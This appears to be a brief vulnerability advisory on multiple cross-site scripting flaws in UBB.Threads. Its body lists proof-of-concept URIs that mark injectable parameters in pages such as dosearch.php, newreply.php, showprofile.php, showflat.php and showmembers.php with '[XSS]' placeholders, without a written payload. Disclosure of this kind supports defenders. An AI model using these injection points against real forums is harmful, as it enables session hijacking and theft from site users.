|
UBBCentral UBB.Threads Multiple Cross-Site Scripting Vulnerabilities
No exploit is required. The following proof of concept URI are available: http://www.example.com/ubbt/dosearch.php?Cat=0&Searchpage=2[XSS]&topic= http://www.example.com/ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818[XSS]&page=0&what=showflat&fpart=1&vc=1 http://www.example.com/ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0&what=showflat[XSS]&fpart=1&vc=1 http://www.example.com/ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0[XSS]&what=showflat&fpart=1&vc=1 http://www.example.com/ubbt/showprofile.php?Cat=0&User=7&Number=39818[XSS]&Board=UBB8&what=showflat&page=0&fpart=1&vc=1 http://www.example.com/ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8[XSS]&what=showflat&page=0&fpart=1&vc=1 http://www.example.com/ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8&what=showflat[XSS]&page=0&fpart=1&vc=1 http://www.example.com/ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0&fpart=all[XSS] http://www.example.com/ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0[XSS]&fpart=all http://www.example.com/ubbt/showmembers.php?Cat=&like=p[XSS]&sb=1&page=1 |
|
|
Privacy Statement |
